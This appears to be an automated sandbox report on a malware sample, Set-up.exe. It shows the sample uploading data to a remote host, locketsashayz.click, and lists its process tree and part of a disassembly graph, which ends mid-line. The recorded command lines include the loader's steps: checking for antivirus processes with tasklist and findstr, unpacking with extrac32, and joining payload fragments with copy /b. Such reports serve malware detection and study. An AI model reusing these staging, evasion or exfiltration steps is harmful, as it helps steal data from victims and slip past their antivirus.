                                    2024-12-25 21:45:07 UTC1226OUTData Raw: 2d 2d 50 5a 49 44 49 5a 4f 47 4e 58 33 37 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 50 5a 49 44 49 5a 4f 47 4e 58 33 37 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 5a 49 44 49 5a 4f 47 4e 58 33 37 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 50 5a 49 44 49 5a 4f 47 4e 58 33 37
                                    Data Ascii: --PZIDIZOGNX37OContent-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--PZIDIZOGNX37OContent-Disposition: form-data; name="pid"1--PZIDIZOGNX37OContent-Disposition: form-data; name="lid"hRjzG3--DRON--PZIDIZOGNX37
                                    2024-12-25 21:45:07 UTC1128INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:45:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=1v3gkv4kutj2hpbv9ahp5v6ltu; expires=Sun, 20 Apr 2025 15:31:46 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OT1gjyc%2BGKGiv0J%2BJQbpn4Uk6cvTIp9Gps6wl1bopnuP0ghdQKHf8UwfcLtdOAY9768DMJVRflBfegrejb7TcKJWc6dDWNclKCiBHUZvnStfam%2BvpFiRTyjPgiG1XkIFvDPmiSn%2B"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c042d093d8ce8-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1799&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2141&delivery_rate=1554845&cwnd=239&unsent_bytes=0&cid=fcb5794523f833c7&ts=755&x=0"
                                    2024-12-25 21:45:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2024-12-25 21:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.449757172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:45:09 UTC284OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=VPWH7DRWQ2W1MIEN
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 592729
                                    Host: locketsashayz.click
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 2d 2d 56 50 57 48 37 44 52 57 51 32 57 31 4d 49 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 45 35 42 35 34 35 39 32 45 46 36 36 43 42 44 30 46 32 33 42 45 33 42 46 41 34 44 37 42 30 0d 0a 2d 2d 56 50 57 48 37 44 52 57 51 32 57 31 4d 49 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 50 57 48 37 44 52 57 51 32 57 31 4d 49 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 56 50 57
                                    Data Ascii: --VPWH7DRWQ2W1MIENContent-Disposition: form-data; name="hwid"B3E5B54592EF66CBD0F23BE3BFA4D7B0--VPWH7DRWQ2W1MIENContent-Disposition: form-data; name="pid"1--VPWH7DRWQ2W1MIENContent-Disposition: form-data; name="lid"hRjzG3--DRON--VPW
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: a9 c3 40 7d 98 6b 1b f4 48 62 0c 70 5b 2a 37 da aa e6 b6 9a ff 60 ae c7 21 9b fb fe 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f
                                    Data Ascii: @}kHbp[*7`!yi*vhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?^ =0
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 77 5c 96 0b 7a f0 2c de 8c cd 42 d2 23 c5 b6 e9 d6 31 d4 77 de ec 38 aa 2d d8 31 17 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f
                                    Data Ascii: w\z,B#1w8-1Az!}2R~:,CfwekfDOsLRb1@g=i*<74S_5[i#b|{EW_|OOH?);El~VsIiC4xb}^p*i5vXDS3e_E3N3CiVl8~01
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 17 aa c8 8e 69 cf 50 cd 4f e0 94 d2 1e 01 b6 50 f5 9c 84 57 2f c0 9d d4 01 eb b7 37 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4
                                    Data Ascii: iPOPW/7_]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa |7r6;!_$
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 5f 37 09 ee 44 13 69 b9 50 a4 87 ff ba 23 2e 6f e9 47 bd 49 cc 2d 0c 77 b7 a3 67 5a d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12
                                    Data Ascii: _7DiP#.oGI-wgZ/.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 2d e5 15 28 ca ba 36 e2 91 80 45 f7 7a 80 9c a4 c2 a7 ef ea 76 27 22 a0 3d ed 44 92 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a
                                    Data Ascii: -(6Ezv'"=Dgliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iV
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: d3 5f c0 88 f9 5d 43 3b 49 ff fa 42 37 04 f0 ad 5f 3c cd 7b 14 86 1e 5c a7 50 c2 1e 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd
                                    Data Ascii: _]C;IB7_<{\PKGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 4d d7 41 d1 3f 25 6f d4 fc 3d a4 d5 de b5 31 58 7d 33 5c 90 77 7e cf c3 80 b6 4b 98 e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca
                                    Data Ascii: MA?%o=1X}3\w~K&a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: 08 7b 5b fe 08 ea 7a 8b c4 2f 02 4c f5 85 eb 28 b6 34 28 7d 82 4c e9 b1 21 76 bd 42 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2
                                    Data Ascii: {[z/L(4(}L!vB=Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}
                                    2024-12-25 21:45:09 UTC15331OUTData Raw: f3 0d 35 fd cd f2 fd db 5d 88 22 d6 73 d5 86 4c 1f 4e 6d c6 b1 9f af 57 9e 67 af df 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6
                                    Data Ascii: 5]"sLNmWgIZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps6
                                    2024-12-25 21:45:11 UTC1133INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:45:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=va356dbv02vc77mf0uiheftrgg; expires=Sun, 20 Apr 2025 15:31:50 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYZnQJFV7W9Z95tXBfbM1dHc8gvISQJx%2B4QXYkrv7FkadI2gDPW9PVOj257lRrj5nghUayMh%2F892v%2F669yUhmzu9kacOevkCb4wgrzWHv36FTuBnyWNnr5MPphGkhAjiQTuG8RV7"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c043aff0b7c7c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1925&rtt_var=731&sent=328&recv=617&lost=0&retrans=0&sent_bytes=2846&recv_bytes=595343&delivery_rate=1487519&cwnd=252&unsent_bytes=0&cid=ce9edbe748905bc5&ts=2386&x=0"


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:16:44:06
                                    Start date:25/12/2024
                                    Path:C:\Users\user\Desktop\Set-up.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                    Imagebase:0x400000
                                    File size:73'414'381 bytes
                                    MD5 hash:91E7814911367EB7CBFA0E57F9BEEAF8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:16:44:07
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmd
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:16:44:07
                                    Start date:25/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:16:44:08
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x5c0000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:16:44:08
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /I "opssvc wrsa"
                                    Imagebase:0xd90000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:16:44:09
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x5c0000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:16:44:09
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                    Imagebase:0xd90000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:16:44:09
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c md 8429
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:16:44:09
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                    Wow64 process (32bit):true
                                    Commandline:extrac32 /Y /E Magnificent
                                    Imagebase:0xed0000
                                    File size:29'184 bytes
                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:16:44:10
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /V "Subsidiary" Sharing
                                    Imagebase:0xd90000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:16:44:10
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b ..\Facilitate + ..\Girlfriend + ..\Id + ..\Paid + ..\Sensor + ..\Channel + ..\Scroll k
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:16:44:10
                                    Start date:25/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    Wow64 process (32bit):true
                                    Commandline:Functions.com k
                                    Imagebase:0xb0000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:16:44:10
                                    Start date:25/12/2024
                                    Path:C:\Windows\SysWOW64\choice.exe
                                    Wow64 process (32bit):true
                                    Commandline:choice /d y /t 5
                                    Imagebase:0x90000
                                    File size:28'160 bytes
                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:17.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1482
                                      Total number of Limit Nodes:25
                                      execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 